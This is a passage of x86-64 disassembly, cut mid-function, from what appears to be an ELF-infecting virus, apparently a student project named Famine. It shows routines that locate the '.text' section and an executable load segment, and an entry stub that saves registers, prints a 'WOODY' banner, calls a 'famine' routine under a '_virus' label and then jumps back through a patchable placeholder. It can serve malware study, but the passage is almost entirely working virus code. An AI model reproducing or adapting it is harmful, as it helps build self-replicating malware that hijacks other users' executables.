    1e2a:	48 89 45 f8          	mov    QWORD PTR [rbp-0x8],rax
    1e2e:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
    1e32:	48 c1 e8 0c          	shr    rax,0xc
    1e36:	48 83 c0 01          	add    rax,0x1
    1e3a:	48 c1 e0 0c          	shl    rax,0xc
    1e3e:	48 89 45 f0          	mov    QWORD PTR [rbp-0x10],rax
    1e42:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
    1e46:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    1e4a:	48 01 d0             	add    rax,rdx
    1e4d:	48 89 45 d8          	mov    QWORD PTR [rbp-0x28],rax
    1e51:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1e55:	48 3b 45 f8          	cmp    rax,QWORD PTR [rbp-0x8]
    1e59:	73 07                	jae    1e62 <find_pvaddr+0x155>
    1e5b:	b8 01 00 00 00       	mov    eax,0x1
    1e60:	eb 3d                	jmp    1e9f <find_pvaddr+0x192>
    1e62:	48 8b 55 f0          	mov    rdx,QWORD PTR [rbp-0x10]
    1e66:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    1e6a:	48 01 d0             	add    rax,rdx
    1e6d:	48 89 45 d8          	mov    QWORD PTR [rbp-0x28],rax
    1e71:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1e75:	48 3b 45 f0          	cmp    rax,QWORD PTR [rbp-0x10]
    1e79:	73 07                	jae    1e82 <find_pvaddr+0x175>
    1e7b:	b8 01 00 00 00       	mov    eax,0x1
    1e80:	eb 1d                	jmp    1e9f <find_pvaddr+0x192>
    1e82:	48 8b 45 c0          	mov    rax,QWORD PTR [rbp-0x40]
    1e86:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
    1e8a:	48 89 50 10          	mov    QWORD PTR [rax+0x10],rdx
    1e8e:	48 8b 45 c0          	mov    rax,QWORD PTR [rbp-0x40]
    1e92:	48 8b 55 f0          	mov    rdx,QWORD PTR [rbp-0x10]
    1e96:	48 89 50 18          	mov    QWORD PTR [rax+0x18],rdx
    1e9a:	b8 00 00 00 00       	mov    eax,0x0
    1e9f:	5d                   	pop    rbp
    1ea0:	c3                   	ret

0000000000001ea1 <exec_segment>:
    1ea1:	55                   	push   rbp
    1ea2:	48 89 e5             	mov    rbp,rsp
    1ea5:	48 83 ec 40          	sub    rsp,0x40
    1ea9:	48 89 7d c8          	mov    QWORD PTR [rbp-0x38],rdi
    1ead:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
    1eb4:	00 
    1eb5:	48 c7 45 e0 00 00 00 	mov    QWORD PTR [rbp-0x20],0x0
    1ebc:	00 
    1ebd:	48 b8 2e 74 65 78 74 	movabs rax,0x747865742e
    1ec4:	00 00 00 
    1ec7:	48 89 45 d8          	mov    QWORD PTR [rbp-0x28],rax
    1ecb:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    1ed2:	00 
    1ed3:	e9 6f 01 00 00       	jmp    2047 <exec_segment+0x1a6>
    1ed8:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1edc:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    1ee0:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
    1ee4:	48 c1 e2 06          	shl    rdx,0x6
    1ee8:	48 01 d0             	add    rax,rdx
    1eeb:	48 89 45 e8          	mov    QWORD PTR [rbp-0x18],rax
    1eef:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1ef3:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    1ef7:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1efb:	48 8b 48 08          	mov    rcx,QWORD PTR [rax+0x8]
    1eff:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1f03:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1f06:	0f b7 40 3e          	movzx  eax,WORD PTR [rax+0x3e]
    1f0a:	0f b7 c0             	movzx  eax,ax
    1f0d:	48 c1 e0 06          	shl    rax,0x6
    1f11:	48 01 c8             	add    rax,rcx
    1f14:	48 8b 48 18          	mov    rcx,QWORD PTR [rax+0x18]
    1f18:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    1f1c:	8b 00                	mov    eax,DWORD PTR [rax]
    1f1e:	89 c0                	mov    eax,eax
    1f20:	48 01 c8             	add    rax,rcx
    1f23:	48 8d 0c 02          	lea    rcx,[rdx+rax*1]
    1f27:	48 8d 45 d8          	lea    rax,[rbp-0x28]
    1f2b:	ba 06 00 00 00       	mov    edx,0x6
    1f30:	48 89 ce             	mov    rsi,rcx
    1f33:	48 89 c7             	mov    rdi,rax
    1f36:	e8 96 f5 ff ff       	call   14d1 <ft_memcmp>
    1f3b:	84 c0                	test   al,al
    1f3d:	0f 84 ff 00 00 00    	je     2042 <exec_segment+0x1a1>
    1f43:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    1f47:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    1f4b:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1f4f:	48 89 50 48          	mov    QWORD PTR [rax+0x48],rdx
    1f53:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    1f5a:	00 
    1f5b:	e9 ca 00 00 00       	jmp    202a <exec_segment+0x189>
    1f60:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1f64:	48 8b 48 10          	mov    rcx,QWORD PTR [rax+0x10]
    1f68:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
    1f6c:	48 89 d0             	mov    rax,rdx
    1f6f:	48 c1 e0 03          	shl    rax,0x3
    1f73:	48 29 d0             	sub    rax,rdx
    1f76:	48 c1 e0 03          	shl    rax,0x3
    1f7a:	48 01 c8             	add    rax,rcx
    1f7d:	48 89 45 e0          	mov    QWORD PTR [rbp-0x20],rax
    1f81:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1f85:	48 8b 50 08          	mov    rdx,QWORD PTR [rax+0x8]
    1f89:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1f8d:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    1f91:	48 01 d0             	add    rax,rdx
    1f94:	48 89 45 f0          	mov    QWORD PTR [rbp-0x10],rax
    1f98:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1f9c:	48 8b 48 30          	mov    rcx,QWORD PTR [rax+0x30]
    1fa0:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
    1fa4:	ba 00 00 00 00       	mov    edx,0x0
    1fa9:	48 f7 f1             	div    rcx
    1fac:	48 89 d0             	mov    rax,rdx
    1faf:	48 85 c0             	test   rax,rax
    1fb2:	74 26                	je     1fda <exec_segment+0x139>
    1fb4:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1fb8:	48 8b 48 30          	mov    rcx,QWORD PTR [rax+0x30]
    1fbc:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1fc0:	48 8b 70 30          	mov    rsi,QWORD PTR [rax+0x30]
    1fc4:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
    1fc8:	ba 00 00 00 00       	mov    edx,0x0
    1fcd:	48 f7 f6             	div    rsi
    1fd0:	48 89 c8             	mov    rax,rcx
    1fd3:	48 29 d0             	sub    rax,rdx
    1fd6:	48 01 45 f0          	add    QWORD PTR [rbp-0x10],rax
    1fda:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1fde:	8b 00                	mov    eax,DWORD PTR [rax]
    1fe0:	83 f8 01             	cmp    eax,0x1
    1fe3:	75 40                	jne    2025 <exec_segment+0x184>
    1fe5:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1fe9:	8b 40 04             	mov    eax,DWORD PTR [rax+0x4]
    1fec:	83 f8 05             	cmp    eax,0x5
    1fef:	75 34                	jne    2025 <exec_segment+0x184>
    1ff1:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1ff5:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    1ff9:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    1ffd:	48 8b 52 18          	mov    rdx,QWORD PTR [rdx+0x18]
    2001:	48 39 c2             	cmp    rdx,rax
    2004:	72 1f                	jb     2025 <exec_segment+0x184>
    2006:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    200a:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    200e:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    2012:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    2016:	48 01 d0             	add    rax,rdx
    2019:	48 3b 45 f0          	cmp    rax,QWORD PTR [rbp-0x10]
    201d:	73 06                	jae    2025 <exec_segment+0x184>
    201f:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    2023:	eb 3f                	jmp    2064 <exec_segment+0x1c3>
    2025:	48 83 45 f8 01       	add    QWORD PTR [rbp-0x8],0x1
    202a:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    202e:	48 8b 00             	mov    rax,QWORD PTR [rax]
    2031:	0f b7 40 38          	movzx  eax,WORD PTR [rax+0x38]
    2035:	0f b7 c0             	movzx  eax,ax
    2038:	48 39 45 f8          	cmp    QWORD PTR [rbp-0x8],rax
    203c:	0f 82 1e ff ff ff    	jb     1f60 <exec_segment+0xbf>
    2042:	48 83 45 f8 01       	add    QWORD PTR [rbp-0x8],0x1
    2047:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    204b:	48 8b 00             	mov    rax,QWORD PTR [rax]
    204e:	0f b7 40 3c          	movzx  eax,WORD PTR [rax+0x3c]
    2052:	0f b7 c0             	movzx  eax,ax
    2055:	48 39 45 f8          	cmp    QWORD PTR [rbp-0x8],rax
    2059:	0f 82 79 fe ff ff    	jb     1ed8 <exec_segment+0x37>
    205f:	b8 00 00 00 00       	mov    eax,0x0
    2064:	c9                   	leave
    2065:	c3                   	ret
    2066:	66 2e 0f 1f 84 00 00 	cs nop WORD PTR [rax+rax*1+0x0]
    206d:	00 00 00 

0000000000002070 <_start>:
    2070:	50                   	push   rax
    2071:	53                   	push   rbx
    2072:	51                   	push   rcx
    2073:	52                   	push   rdx
    2074:	54                   	push   rsp

0000000000002075 <affichage>:
    2075:	68 2e 2e 2e 0a       	push   0xa2e2e2e
    207a:	68 4f 4f 44 59       	push   0x59444f4f
    207f:	68 2e 2e 2e 57       	push   0x572e2e2e
    2084:	b8 01 00 00 00       	mov    eax,0x1
    2089:	bf 02 00 00 00       	mov    edi,0x2
    208e:	48 89 e6             	mov    rsi,rsp
    2091:	ba 14 00 00 00       	mov    edx,0x14
    2096:	0f 05                	syscall
    2098:	58                   	pop    rax
    2099:	58                   	pop    rax
    209a:	58                   	pop    rax

000000000000209b <_virus>:
    209b:	e8 60 ef ff ff       	call   1000 <famine>
    20a0:	5c                   	pop    rsp
    20a1:	5a                   	pop    rdx
    20a2:	59                   	pop    rcx
    20a3:	5b                   	pop    rbx
    20a4:	58                   	pop    rax
    20a5:	e9 00 00 00 00       	jmp    20aa <_virus+0xf>
    20aa:	b8 3c 00 00 00       	mov    eax,0x3c
    20af:	bf 00 00 00 00       	mov    edi,0x0
    20b4:	0f 05                	syscall
